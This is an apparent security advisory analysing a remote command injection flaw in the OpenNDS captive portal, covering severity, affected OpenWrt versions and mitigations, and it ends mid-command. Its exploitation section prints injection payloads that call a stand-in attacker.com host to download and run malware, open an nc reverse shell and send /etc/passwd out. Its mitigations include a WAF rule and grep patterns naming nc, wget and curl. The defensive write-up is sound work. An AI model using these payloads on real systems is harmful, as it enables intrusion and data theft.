Description
An issue was discovered in OpenNDS Captive Portal before version 10.1.2. When the custom unescape callback is enabled, attackers can execute arbitrary OS commands by inserting them into the URL portion of HTTP GET requests. Affected OpenNDS Captive Portal before version 10.1.2 fixed in OpenWrt master, OpenWrt 23.05 and OpenWrt 22.03 on 28. August 2023 by updating OpenNDS to version 10.1.3.
EPSS Score:
1%
EUVD-2023-42135 Technical Analysis
OpenNDS Captive Portal Remote Command Injection Vulnerability
1. VULNERABILITY ASSESSMENT AND SEVERITY EVALUATION
Severity Classification: CRITICAL
CVSS 3.1 Base Score: 9.8/10
Vector Analysis:
- Attack Vector (AV:N): Network-exploitable, requiring no physical or local access
- Attack Complexity (AC:L): Low complexity; no specialized conditions required
- Privileges Required (PR:N): No authentication or privileges needed
- User Interaction (UI:N): Fully automated exploitation possible
- Scope (S:U): Unchanged; impacts the vulnerable component only
- Confidentiality (C:H): Complete information disclosure possible
- Integrity (I:H): Total system compromise achievable
- Availability (A:H): Complete denial of service potential
EPSS Score: 1% - Indicates relatively low observed exploitation in the wild, though this may reflect limited deployment rather than low exploitability.
Risk Assessment:
This vulnerability represents a critical security flaw enabling unauthenticated remote code execution (RCE). The combination of network accessibility, zero authentication requirements, and arbitrary OS command execution capability makes this an extremely dangerous vulnerability requiring immediate remediation.
2. POTENTIAL ATTACK VECTORS AND EXPLOITATION METHODS
Vulnerability Mechanism:
The vulnerability exists in the custom unescape callback function within OpenNDS Captive Portal. When enabled, this function improperly sanitizes user-supplied input from HTTP GET request URLs, allowing command injection.
Attack Vectors:
Primary Vector: HTTP GET Request Manipulation
Typical exploitation pattern:
GET /[injection_point]?param=value;malicious_command HTTP/1.1
Host: [captive_portal_ip]
Exploitation Methodology:
-
Reconnaissance Phase:
- Identify OpenNDS captive portal (typically on public WiFi networks)
- Determine if custom unescape callback is enabled
- Map accessible endpoints
-
Injection Phase:
- Craft malicious URL with embedded OS commands
- Common injection techniques:
- Command chaining:
; command - Command substitution:
$(command)or`command` - Pipe operators:
| command - Background execution:
& command
- Command chaining:
-
Payload Examples:
/splash?redirect=http://example.com;wget http://attacker.com/malware -O /tmp/m && chmod +x /tmp/m && /tmp/m /status?client=$(nc attacker.com 4444 -e /bin/sh) /auth?token=valid;cat /etc/passwd | nc attacker.com 1234
Attack Scenarios:
Scenario 1: Initial Access & Persistence
- Establish reverse shell for persistent access
- Deploy backdoors or rootkits
- Create privileged user accounts
Scenario 2: Lateral Movement
- Compromise captive portal gateway
- Pivot to internal network segments
- Access backend infrastructure
Scenario 3: Data Exfiltration
- Extract configuration files containing credentials
- Capture network traffic (man-in-the-middle position)
- Steal user authentication data passing through portal
Scenario 4: Service Disruption
- Execute denial-of-service commands
- Modify routing tables
- Disable security controls
3. AFFECTED SYSTEMS AND SOFTWARE VERSIONS
Directly Affected Software:
OpenNDS Captive Portal:
- Vulnerable Versions: All versions < 10.1.2
- Fixed Versions: 10.1.3 and later
- Critical Note: Vulnerability only exploitable when custom unescape callback is enabled
Affected Platforms:
OpenWrt Distributions:
- OpenWrt Master branch (fixed August 28, 2023)
- OpenWrt 23.05 (patched)
- OpenWrt 22.03 (patched)
- Earlier OpenWrt versions running vulnerable OpenNDS
Deployment Contexts:
High-Risk Environments:
-
Public WiFi Infrastructure:
- Hotels, airports, cafes, shopping centers
- Educational institutions
- Municipal wireless networks
-
Enterprise Guest Networks:
- Corporate visitor access points
- Conference facilities
- Co-working spaces
-
IoT and Embedded Systems:
- Sierra Wireless products (specifically mentioned in references)
- Custom router firmware
- Network appliances
-
Service Provider Networks:
- ISP customer portals
- Managed WiFi services
- Hotspot operators
Identification Methods:
Detection Indicators:
- OpenNDS service running on ports 80/443
- Captive portal redirect behavior
- Banner grabbing revealing OpenNDS version
- Configuration files in
/etc/opennds/
4. RECOMMENDED MITIGATION STRATEGIES
Immediate Actions (Priority 1 - Within 24 Hours):
1. Version Upgrade:
# For OpenWrt systems
opkg update
opkg upgrade opennds
# Verify version
opennds -v # Should show 10.1.3 or higher
2. Disable Custom Unescape Callback: If immediate patching is impossible, disable the vulnerable feature:
# Edit OpenNDS configuration
vi /etc/config/opennds
# Set or verify:
option custom_unescape '0'
# Restart service
/etc/init.d/opennds restart
3. Network Segmentation:
- Isolate captive portal systems from critical infrastructure
- Implement strict firewall rules limiting outbound connections
- Deploy on DMZ segments with minimal trust
Short-Term Mitigations (Priority 2 - Within 1 Week):
4. Web Application Firewall (WAF) Rules: Deploy detection/blocking rules for command injection patterns:
# Example ModSecurity-style rules
SecRule REQUEST_URI "@rx (?:;|\||&|\$\(|`|>|<)" \
"id:1001,phase:1,deny,status:403,msg:'Command injection attempt'"
5. Input Validation at Network Edge:
- Deploy reverse proxy with strict URL validation
- Implement allowlist-based filtering
- Block special characters in URL parameters
6. Monitoring and Detection:
# Monitor for exploitation attempts
tail -f /var/log/opennds.log | grep -E '(;|\||&|\$\(|`)'
# Check for suspicious processes
ps aux | grep -E '(nc|netcat|wget|curl|bash|sh)' | grep -v grep
Long-Term Security Measures (Priority 3 - Ongoing):
7. Security Hardening:
- Run OpenNDS with minimal privileges (non-root where possible)
- Implement AppArmor/SELinux profiles
- Enable system call filtering (seccomp)
- Remove unnecessary system utilities (nc, wget, curl) if not required
8. Configuration Management:
# Secure OpenNDS configuration
chmod 600 /etc/config/opennds
chown root:root /etc/config/opennds
# Disable unnecessary features
option enable_preauth '0'
option enable_custom_scripts '0'
9. Network Architecture:
- Implement zero-trust network access (ZTNA) principles
- Deploy intrusion detection/prevention systems (IDS/IPS)
- Enable comprehensive logging to SIEM
- Implement egress filtering
10. Vulnerability Management Program:
- Subscribe to OpenNDS security advisories
- Implement automated vulnerability scanning
- Establish patch management procedures
- Conduct regular security assessments
Verification Procedures:
Post-Mitigation Testing:
# 1. Verify version
opennds -v
# 2. Check configuration
uci show opennds | grep custom_unescape
# 3. Test for vulnerability (safe test)
curl "http://[portal-ip]/splash?test=;echo%20VULNERABLE"
# Should NOT execute the echo command
# 4. Review logs for exploitation attempts
grep -i